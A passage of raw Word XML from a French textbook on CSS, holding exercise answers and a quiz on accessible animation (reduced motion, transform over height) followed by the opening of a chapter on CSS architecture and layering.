          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>background-position</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16.1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.panneau {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: fixed;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-block: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  inset-inline-end: 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: min(22rem, 90vw);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #fff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transform: translateX(100%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  transition: transform .28s cubic-bezier(.2,.8,.2,1);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-shadow: -8px 0 30px rgb(15 46 76 / 18%);</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.panneau[data-ouvert="true"] { transform: translateX(0); }</w:t>
        <w:br/>
        <w:br/>
        <w:t>@media (prefers-reduced-motion: reduce) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .panneau { transition: none; }</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le panneau reste dans le flux visuel mais hors écran ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>translateX(100%)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> le place à droite sans jamais modifier la largeur du body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sans transition, l'ouverture reste instantanée : l'information est conservée, seule l'animation disparaît.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 16.2</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&lt;button class="bouton" aria-busy="false"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;span class="bouton__texte"&gt;Envoyer&lt;/span&gt;</w:t>
        <w:br/>
        <w:t>&lt;/button&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;style&gt;</w:t>
        <w:br/>
        <w:t>.bouton[aria-busy="true"] { cursor: progress; }</w:t>
        <w:br/>
        <w:t>.bouton[aria-busy="true"] .bouton__texte::after {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  content: "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: inline-block;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: .8em; height: .8em;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-inline-start: .5em;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border: 2px solid currentColor;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-inline-end-color: transparent;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 50%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  animation: rotation .8s linear infinite;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>@keyframes rotation { to { transform: rotate(1turn); } }</w:t>
        <w:br/>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-busy="true"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annonce le traitement ; le bouton reçoit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pendant l'envoi pour empêcher le double clic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le mouvement du cercle est décoratif ; il est neutralisé par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prefers-reduced-motion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et remplacé par le texte « Envoi en cours… ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 16.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Animer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> recalcule la mise en page : préférer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform: scaleY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ou une grille avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grid-template-rows: 0fr → 1fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> si la hauteur doit réellement varier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Animer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décale le contenu environnant : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform: translateY(-8px)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> produit le même effet sans reflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>background-position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> force une repeinture à chaque image : déplacer un pseudo-élément avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est beaucoup plus économique.</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Quelle propriété s'anime sans recalcul de mise en page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height</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margin</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transform</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top</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Quelle durée convient à une transition d'interface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10 ms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150 à 300 ms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1 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5 s</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 xml:space="preserve">Que déclenche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>prefers-reduced-motion: reduce</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Une désactivation du CSS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Une préférence utilisateur pour limiter le mouvement</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Un mode sombre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Une réduction de la résolution</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>animation-fill-mode: both</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Elle répète l'animation</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Elle conserve les styles de début et de fin</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Elle inverse l'animation</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Elle la met en pause</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Pourquoi éviter un carrousel à défilement automatique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Il consomme trop de mémoire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Il peut déclencher des troubles vestibulaires et voler le contrôle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Il n'est pas supporté</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Il empêche le référencement</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C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>transform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est traitée par le compositeur, comme </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, sans recalcul du flux.</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En dessous, le changement est imperceptible ; au-delà, l'interface paraît lente.</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Cette media query reflète un réglage système : l'utilisateur demande moins d'animations, souvent pour des raisons de santé.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applique l'état initial avant le démarrage et l'état final après la fin, ce qui évite les retours brutaux.</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Un mouvement automatique non pausable gêne l'attention et peut provoquer un malaise ; il doit au minimum proposer une pause.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId29"/>
          <w:footerReference w:type="default" r:id="rId30"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1474" w:right="1361" w:bottom="1361" w:left="1531" w:header="709" w:footer="652" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9014"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11679" w:hRule="exact"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9240"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0F2E4C"/>
            <w:tcMar>
              <w:top w:w="800" w:type="dxa"/>
              <w:left w:w="680" w:type="dxa"/>
              <w:bottom w:w="800" w:type="dxa"/>
              <w:right w:w="680" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="20"/>
                <w:spacing w:val="60"/>
              </w:rPr>
              <w:t>PARTIE III</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TitrePartie"/>
              <w:spacing w:before="0" w:after="160" w:line="680" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="56"/>
              </w:rPr>
              <w:t>Mise en page moderne et accessibilité</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="16" w:space="1" w:color="E0A21B"/>
              </w:pBdr>
              <w:spacing w:before="0" w:after="200"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80" w:after="280" w:line="330" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="D6E1EB"/>
                <w:sz w:val="23"/>
              </w:rPr>
              <w:t>Composer avec Flexbox, Grid, le positionnement, les media queries et les unités fluides, sans jamais sacrifier l'accès.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="E0A21B"/>
                <w:sz w:val="16"/>
                <w:spacing w:val="40"/>
              </w:rPr>
              <w:t>CHAPITRES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:line="270" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="C9D6E2"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1. Architecture CSS et conception · 2. Flexbox : aligner sur un axe · 3. CSS Grid : structurer la page · 4. Positionnement et couches · 5. Design responsive · 6. Unités fluides et rythme vertical · 7. Accessibilité web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>17. Architecture CSS et conception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Au-delà de quelques pages, une feuille de style sans architecture devient un passif. Voici comment la garder saine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 16</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Organiser les fichiers CSS d'un projet de taille moyenne.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Choisir une convention de nommage et s'y tenir.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Définir des jetons de conception (couleurs, espacements, typographie).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Comprendre l'intérêt des couches et des composants isolés.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Réduire le CSS mort et mesurer la croissance du projet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>17.1 Pourquoi l'architecture compte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une feuille de style grossit toujours : nouveaux écrans, nouvelles variantes, corrections urgentes. Sans structure, chaque ajout augmente le risque de casser un écran existant. L'architecture CSS consiste à limiter ce risque par des règles d'organisation explicites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="26" name="Picture 26"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f24.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.24 — Une organisation en couches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.56 — Cinq couches et leurs frontières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13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Couche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Responsabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Ne doit pas</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jetons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valeurs de conception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenir de sélecteurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Rendus par défaut des éléments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Styler des classes</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mise en page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Structure des pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Définir l'apparence interne</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Composants</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Apparence autonome</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Dépendre du contexte parent</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Utilitaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une seule propriété</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
